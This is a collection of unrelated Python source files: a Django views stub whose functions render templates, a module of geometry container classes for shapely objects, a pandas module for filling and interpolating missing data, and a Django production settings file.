return render(request, 'invoice.html' )
def invoice_print(request):
return render(request, 'invoice_print.html' )
def layer(request):
return render(request, 'layer.html' )
def layerdate(request):
return render(request, 'layerdate.html' )
def layouts(request):
return render(request, 'layouts.html' )
def lockscreen(request):
return render(request, 'lockscreen.html' )
def login(request):
return render(request, 'login.html' )
def mailbox(request):
return render(request, 'mailbox.html' )
def mail_compose(request):
return render(request, 'mail_compose.html' )
def mail_detail(request):
return render(request, 'mail_detail.html' )
def modal_window(request):
return render(request, 'modal_window.html' )
def nestable_list(request):
return render(request, 'nestable_list.html' )
def notifications(request):
return render(request, 'notifications.html' )
def pin_board(request):
return render(request, 'pin_board.html' )
def profile(request):
return render(request, 'profile.html' )
def projects(request):
return render(request, 'projects.html' )
def project_detail(request):
return render(request, 'project_detail.html' )
def register(request):
return render(request, 'register.html' )
def search_results(request):
return render(request, 'search_results.html' )
def table_basic(request):
return render(request, 'table_basic.html' )
def table_data_tables(request):
return render(request, 'table_data_tables.html' )
def table_jqgrid(request):
return render(request, 'table_jqgrid.html' )
def tabs_panels(request):
return render(request, 'tabs_panels.html' )
def timeline(request):
return render(request, 'timeline.html' )
def timeline_v2(request):
return render(request, 'timeline_v2.html' )
def toastr_notifications(request):
return render(request, 'toastr_notifications.html' )
def tree_view(request):
return render(request, 'tree_view.html' )
def tree_view_v2(request):
return render(request, 'tree_view_v2.html' )
def typography(request):
return render(request, 'typography.html' )
def validation(request):
return render(request, 'validation.html' )
def webim(request):
return render(request, 'webim.html' )
def widgets(request):
return render(request, 'widgets.html' )
|
|
"""
=================
`geoutil._geoset`
=================
Container classes for organizing collections of `shapely.geometry` objects.
This module defines a custom data structure called a *geoset* that enables
basic grouping and attribution of objects from `shapely.geometry`. The
geoset structure is implemented using nested classes: `Geo` instances are
stored in `Item` instances, and `Item` instances are stored in a `Geoset`
instance. See the `Geoset` class for a full description of the geoset
model.
Classes
-------
======== ==========================================
`Geo` Container for a single geometry object.
`Item` Container for a group of `Geo` instances.
`Geoset` Container for a group of `Item` instances.
======== ==========================================
"""
from collections import OrderedDict
from astropy import wcs
from shapely import geometry
from . import _utils
class Geo(object):
"""Container for a single geometry object.
Store a geometry class instance from `shapely.geometry` and a set of
attributes. This class represents the smallest unit in the geoset
specification (see the `Geoset` class for an overview).
Parameters
----------
geo : class from `shapely.geometry` or None
Initializes the `geo` instance variable.
attrs : optional
Initializes the `attrs` instance variable. Default value is None.
Attributes
----------
geo : class from `shapely.geometry` or None
Any class instance from `shapely.geometry`, e.g., `Polygon`. May also
be None.
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
Methods
-------
pix2world
world2pix
translate
copy
"""
def __init__(self, geo, attrs=None):
self.geo = geo
self.attrs = attrs
def __str__(self, i=None, n=None, indent=' ', level=0):
"""
Parameters
----------
i : int
geo number.
n : int
Number of geos encountered before the parent item.
indent : str
Set the indent for geo lines.
level : int
Set the indent level for geos.
"""
geostr = 'None' if self.geo is None else self.geo.type
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
if i is not None and n is not None:
istr = ' {0:d},{1:d}: '.format(i, i+n)
elif i is not None:
istr = ' {0:d}: '.format(i)
else:
istr = ': '
return level*indent + 'Geo' + istr + geostr + attrstr
def pix2world(self, hdr):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Geo`
Copy of the original with coordinates converted to the WCS
world system.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_pix2world([self.geo], hdr)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def world2pix(self, hdr):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Geo`
Copy of the original with coordinates converted to the pixel
system.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_world2pix([self.geo], hdr)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by `dx` and `dy`.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Geo`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_translate([self.geo], dx, dy)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Geo`
Deep copy of the original.
Notes
-----
The geometry object is copied by computing its union with a null
geometry. As a result, the coordinates of this copy may be
reordered from the original and string representations would not be
equal. The `attrs` instance variable is copied as an `OrderedDict`
(unless it is None).
"""
if self.geo is None:
geo = None
else:
geo = self.geo.union(geometry.Point())
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
class Item(object):
"""Container for a group of `Geo` instances.
Store any number of `Geo` class instances and a set of attributes. This
class represents the intermediate unit in the geoset specification (see
the `Geoset` class for an overview).
Parameters
----------
geos : list, tuple, `Geo`, or None
Initialize the `geos` instance variable using either a list or
tuple of zero or more `Geo` instances, a single `Geo` instance
(will automatically be turned into a list of length 1), or None.
attrs : optional
Initialize the `attrs` instance variable. Default value is None.
Attributes
----------
geos : list
List of zero or more `Geo` instances.
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
Methods
-------
pix2world
world2pix
translate
copy
"""
def __init__(self, geos, attrs=None):
if not geos:
geos = []
elif not getattr(geos, '__iter__', False):
geos = [geos]
self.geos = geos
self.attrs = attrs
def __str__(self, i=None, n=None, indent=' ', level=0):
"""
Parameters
----------
i : int
Item number.
n : int
Number of geos encountered before this item.
indent : str
Set the indent for item lines.
level : int
Set the indent level for items.
"""
if not self.geos:
geosstr = 'None'
else:
geosstr = '{0:d} geo(s)'.format(len(self.geos))
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
istr = ': ' if i is None else ' {0:d}: '.format(i)
lines = [level*indent + 'Item' + istr + geosstr + attrstr]
for j, geo in enumerate(self.geos):
lines.append(geo.__str__(i=j+1, n=n, level=level+1))
return '\n'.join(lines)
def pix2world(self, hdr):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Item`
Copy of the original with coordinates converted to the WCS
world system.
"""
geos = [geo.pix2world(hdr) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def world2pix(self, hdr):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Item`
Copy of the original with coordinates converted to the pixel
system.
"""
geos = [geo.world2pix(hdr) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by `dx` and `dy`.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Item`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
geos = [geo.translate(dx, dy) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Item`
Deep copy of the original.
Notes
-----
Each geometry object is copied by computing its union with a null
geometry. As a result, the coordinates of a copy may be reordered
from the original and string representations would not be equal.
Each `attrs` instance variable is copied as an `OrderedDicts`
(unless it is None).
"""
geos = [geo.copy() for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
class Geoset(object):
"""Container for a group of `Item` instances.
This class defines a custom data structure called a geoset that enables
basic grouping and attribution of objects from `shapely.geometry` (e.g.
`Polygons`).
Parameters
----------
items : list, tuple, `Item`, or None
Initialize the `items` instance variable using either a list or
tuple of zero or more `Item` instances, a single `Item` instance,
or None.
attrs : optional
Initialize the `attrs` instance variable. Default value is None.
hdr : optional
Initialize the `hdr` instance variable. Default value is None.
Attributes
----------
items : list
List of zero or more `Item` instances.
geos
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
hdr : `astropy.io.fits.header.Header` or None
FITS header that relates to the stored geometries, e.g. WCS
information for transforming between pixel and sky coordinates.
None if no header.
Methods
-------
pix2world
world2pix
translate
copy
Notes
-----
The geoset structure is a simple tree-like hierarchy of nested classes,
and is implemented as follows:
=========== ======== ====== ======
level 1 2 3
=========== ======== ====== ======
class `Geoset` `Item` `Geo`
container .items .geos .geo
attributes .attrs .attrs .attrs
FITS header .hdr
=========== ======== ====== ======
A single geometry object is contained with its specific attributes in a
`Geo` instance. Multiple (possibly related) `Geo` instances are grouped
together in an `Item` instance, along with a set of attributes specific
to the group. The `Geoset` class contains a set of `Item` instances.
The geoset as a whole may carry a set attributes, as well as a FITS
header (an `astropy.io.fits.Header` instance; particularly useful if
the geometries are all specified in pixel coordinates). All attribute
sets are dict-like, typically `OrderedDict` instances. See the `Item`
and `Geo` classes for further details.
There is some flexibility in how geometry objects are assigned to an
item. Any number of `Geo` instances are allowed within an `Item`, while
the `shapely.geometry` subpackage supports various "multi" geometry
objects and collections, such as `MultiPolygon`. It is therefore
possible for an item to have several `Geo` instances, each with a
different geometry type, including collections, `MultiPolygons`, etc.
A typical use is storing polygons of regions identified in an image.
The FITS image header and any "global" attributes of the region set
could be stored in a `Geoset`, along with a list of `Item` instances,
where an "item" in this case could mean an individual region. Each
`Item` might contain some attributes describing the specific region
(name, etc.), and then a list of `Geo` instances, each of which
contains a polygon object (and even more attributes, if needed). The
number of `Geo` instances assigned to each item/region depends on the
complexity of the region; simple regions described by a single polygon
would only require one `Geo` instance.
Examples
--------
To build a geoset from scratch given a single geometry object (e.g. a
`shapely.geometry.Polygon` instance, ``poly``),
>>> geo = Geo(poly)
>>> item = Item(geo)
>>> geoset = Geoset(item)
>>> print geoset
Geoset: 1 item(s), 1 geo(s)
Item 1: 1 geo(s)
Geo 1,1: Polygon
To add on to an existing geoset (e.g. a second polygon, ``poly2``),
>>> item = geoset.items[0].geos.append(Geo(poly2))
>>> print geoset
Geoset: 1 item(s), 2 geo(s)
Item 1: 2 geo(s)
Geo 1,1: Polygon
Geo 2,2: Polygon
"""
def __init__(self, items=None, attrs=None, hdr=None):
if items is None:
items = []
elif not getattr(items, '__iter__', False):
items = [items]
self.items = items
self.attrs = attrs
self.hdr = hdr
self._geos = None
def __str__(self):
if not self.items:
itemsstr = ': None'
else:
itemsstr = ': {0:d} item(s)'.format(len(self.items))
ngeos = sum([len(item.geos) for item in self.items])
geosstr = ', {0:d} geo(s)'.format(ngeos)
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
hdrstr = '' if self.hdr is None else ', FITS header'
lines = ['Geoset' + itemsstr + geosstr + attrstr + hdrstr]
n = 0
for j, item in enumerate(self.items):
lines.append(item.__str__(i=j+1, n=n, level=1))
n += len(item.geos)
return '\n'.join(lines)
def pix2world(self, hdr=None):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the geoset must
be updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header` or None, optional
Transform coordinates according to the WCS information in the
FITS header. If None, the header stored in the geoset is used.
Default value is None.
Returns
-------
out : `Geoset`
Copy of the original with coordinates converted to the WCS
world system.
"""
if hdr is None:
hdr = self.hdr
items = [item.pix2world(hdr) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def world2pix(self, hdr=None):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the geoset must
be updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header` or None, optional
Transform coordinates according to the WCS information in the
FITS header. If None, the header stored in the geoset is used.
Default value is None.
Returns
-------
out : `Geoset`
Copy of the original with coordinates converted to the pixel
system.
"""
if hdr is None:
hdr = self.hdr
items = [item.world2pix(hdr) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by dx and dy.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Geoset`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
items = [item.translate(dx, dy) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Geoset`
Deep copy of the original.
Notes
-----
Each geometry object in the tree is copied by computing its union
with a null geometry. As a result, the coordinates of a copy may be
reordered from the original and string representations would not be
equal. Each `attrs` instance variable in the tree is copied as an
`OrderedDict` (unless it is None).
"""
items = [item.copy() for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
@property
def geos(self):
"""Return a complete listing of `Geo` instances in the tree.
This is a read-only attribute; setting and deleting members in this
list are not supported.
Returns
-------
out : list
A list of all `Geo` instances stored in the tree.
"""
self._geos = []
for item in self.items:
for geo in item.geos:
self._geos.append(geo)
return self._geos
|
|
"""
Routines for filling missing data.
"""
import numpy as np
from pandas._libs import algos, lib
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from_array
from pandas.core.dtypes.common import (
ensure_float64,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer,
is_integer_dtype,
is_numeric_v_string_like,
is_scalar,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import isna
def mask_missing(arr, values_to_mask):
"""
Return a masking array of same size/shape as arr
with entries equaling any member of values_to_mask set to True
"""
dtype, values_to_mask = infer_dtype_from_array(values_to_mask)
try:
values_to_mask = np.array(values_to_mask, dtype=dtype)
except Exception:
values_to_mask = np.array(values_to_mask, dtype=object)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
mask = None
for x in nonna:
if mask is None:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask = False
else:
mask = arr == x
# if x is a string and arr is not, then we get False and we must
# expand the mask to size arr.shape
if is_scalar(mask):
mask = np.zeros(arr.shape, dtype=bool)
else:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask |= False
else:
mask |= arr == x
if na_mask.any():
if mask is None:
mask = isna(arr)
else:
mask |= isna(arr)
# GH 21977
if mask is None:
mask = np.zeros(arr.shape, dtype=bool)
return mask
def clean_fill_method(method, allow_nearest=False):
# asfreq is compat for resampling
if method in [None, "asfreq"]:
return None
if isinstance(method, str):
method = method.lower()
if method == "ffill":
method = "pad"
elif method == "bfill":
method = "backfill"
valid_methods = ["pad", "backfill"]
expecting = "pad (ffill) or backfill (bfill)"
if allow_nearest:
valid_methods.append("nearest")
expecting = "pad (ffill), backfill (bfill) or nearest"
if method not in valid_methods:
msg = "Invalid fill method. Expecting {expecting}. Got {method}".format(
expecting=expecting, method=method
)
raise ValueError(msg)
return method
def clean_interp_method(method, **kwargs):
order = kwargs.get("order")
valid = [
"linear",
"time",
"index",
"values",
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"polynomial",
"krogh",
"piecewise_polynomial",
"pchip",
"akima",
"spline",
"from_derivatives",
]
if method in ("spline", "polynomial") and order is None:
raise ValueError("You must specify the order of the spline or " "polynomial.")
if method not in valid:
raise ValueError(
"method must be one of {valid}. Got '{method}' "
"instead.".format(valid=valid, method=method)
)
return method
def interpolate_1d(
xvalues,
yvalues,
method="linear",
limit=None,
limit_direction="forward",
limit_area=None,
fill_value=None,
bounds_error=False,
order=None,
**kwargs
):
"""
Logic for the 1-d interpolation. The result should be 1-d, inputs
xvalues and yvalues will each be 1-d arrays of the same length.
Bounds_error is currently hardcoded to False since non-scipy ones don't
take it as an argument.
"""
# Treat the original, non-scipy methods first.
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
# have to call np.asarray(xvalues) since xvalues could be an Index
# which can't be mutated
result = np.empty_like(np.asarray(xvalues), dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == "time":
if not getattr(xvalues, "is_all_dates", None):
# if not issubclass(xvalues.dtype.type, np.datetime64):
raise ValueError(
"time-weighted interpolation only works "
"on Series or DataFrames with a "
"DatetimeIndex"
)
method = "values"
valid_limit_directions = ["forward", "backward", "both"]
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
msg = "Invalid limit_direction: expecting one of {valid!r}, " "got {invalid!r}."
raise ValueError(
msg.format(valid=valid_limit_directions, invalid=limit_direction)
)
if limit_area is not None:
valid_limit_areas = ["inside", "outside"]
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError(
"Invalid limit_area: expecting one of {}, got "
"{}.".format(valid_limit_areas, limit_area)
)
# default limit is unlimited GH #16282
if limit is None:
# limit = len(xvalues)
pass
elif not is_integer(limit):
raise ValueError("Limit must be an integer")
elif limit < 1:
raise ValueError("Limit must be greater than 0")
from pandas import Series
ys = Series(yvalues)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(ys.first_valid_index()))
end_nans = set(range(1 + ys.last_valid_index(), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
# are more than'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
if limit_direction == "forward":
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == "backward":
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == "inside":
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == "outside":
# preserve NaNs on the inside
preserve_nans |= mid_nans
# sort preserve_nans and covert to list
preserve_nans = sorted(preserve_nans)
xvalues = getattr(xvalues, "values", xvalues)
yvalues = getattr(yvalues, "values", yvalues)
result = yvalues.copy()
if method in ["linear", "time", "index", "values"]:
if method in ("values", "index"):
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if needs_i8_conversion(inds.dtype.type):
inds = inds.view(np.int64)
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
else:
inds = xvalues
result[invalid] = np.interp(inds[invalid], inds[valid], yvalues[valid])
result[preserve_nans] = np.nan
return result
sp_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"krogh",
"spline",
"polynomial",
"from_derivatives",
"piecewise_polynomial",
"pchip",
"akima",
]
if method in sp_methods:
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if issubclass(inds.dtype.type, np.datetime64):
inds = inds.view(np.int64)
result[invalid] = _interpolate_scipy_wrapper(
inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order,
**kwargs
)
result[preserve_nans] = np.nan
return result
def _interpolate_scipy_wrapper(
x, y, new_x, method, fill_value=None, bounds_error=False, order=None, **kwargs
):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
the list in _clean_interp_method.
"""
extra = "{method} interpolation requires SciPy.".format(method=method)
import_optional_dependency("scipy", extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
"barycentric": interpolate.barycentric_interpolate,
"krogh": interpolate.krogh_interpolate,
"from_derivatives": _from_derivatives,
"piecewise_polynomial": _from_derivatives,
}
if getattr(x, "is_all_dates", False):
# GH 5975, scipy.interp1d can't hande datetime64s
x, new_x = x._values.astype("i8"), new_x.astype("i8")
if method == "pchip":
try:
alt_methods["pchip"] = interpolate.pchip_interpolate
except AttributeError:
raise ImportError(
"Your version of Scipy does not support " "PCHIP interpolation."
)
elif method == "akima":
alt_methods["akima"] = _akima_interpolate
interp1d_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"polynomial",
]
if method in interp1d_methods:
if method == "polynomial":
method = order
terp = interpolate.interp1d(
x, y, kind=method, fill_value=fill_value, bounds_error=bounds_error
)
new_y = terp(new_x)
elif method == "spline":
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError(
"order needs to be specified and greater than 0; "
"got order: {}".format(order)
)
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This numberincludes the function
value as 0th derivative.
extrapolate : bool, optional
Whether to extrapolate to ouf-of-bounds points based on first and last
intervals, or to return NaNs. Default: True.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1), orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int or list, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R,
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif interpolate._isscalar(der):
return P(x, der=der)
else:
return [P(x, nu) for nu in der]
def interpolate_2d(
values, method="pad", axis=0, limit=None, fill_value=None, dtype=None
):
"""
Perform an actual interpolation of values, values will be make 2-d if
needed fills inplace, returns the result.
"""
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with " "axis != 0")
values = values.reshape(tuple((1,) + values.shape))
if fill_value is None:
mask = None
else: # todo create faster fill func without masking
mask = mask_missing(transf(values), fill_value)
method = clean_fill_method(method)
if method == "pad":
values = transf(pad_2d(transf(values), limit=limit, mask=mask, dtype=dtype))
else:
values = transf(
backfill_2d(transf(values), limit=limit, mask=mask, dtype=dtype)
)
# reshape back
if ndim == 1:
values = values[0]
return values
def _cast_values_for_fillna(values, dtype):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if (
is_datetime64_dtype(dtype)
or is_datetime64tz_dtype(dtype)
or is_timedelta64_dtype(dtype)
):
values = values.view(np.int64)
elif is_integer_dtype(values):
# NB: this check needs to come after the datetime64 check above
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None, dtype=None):
# boilerplate for pad_1d, backfill_1d, pad_2d, backfill_2d
if dtype is None:
dtype = values.dtype
if mask is None:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype)
mask = mask.view(np.uint8)
return values, mask
def pad_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.pad_inplace(values, mask, limit=limit)
return values
def backfill_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.backfill_inplace(values, mask, limit=limit)
return values
def pad_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def backfill_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {"pad": pad_1d, "backfill": backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = set(np.where(windowed)[0] + limit) | set(
np.where((~invalid[: limit + 1]).cumsum() == 0)[0]
)
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
def _rolling_window(a, window):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
|
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use mailgun to send emails
- Use Redis on Heroku
'''
from __future__ import absolute_import, unicode_literals
from django.utils import six
from .common import * # noqa
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# django-secure
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("djangosecure", )
SECURITY_MIDDLEWARE = (
'djangosecure.middleware.SecurityMiddleware',
)
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
MIDDLEWARE_CLASSES = SECURITY_MIDDLEWARE + MIDDLEWARE_CLASSES
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_HTTPONLY = True
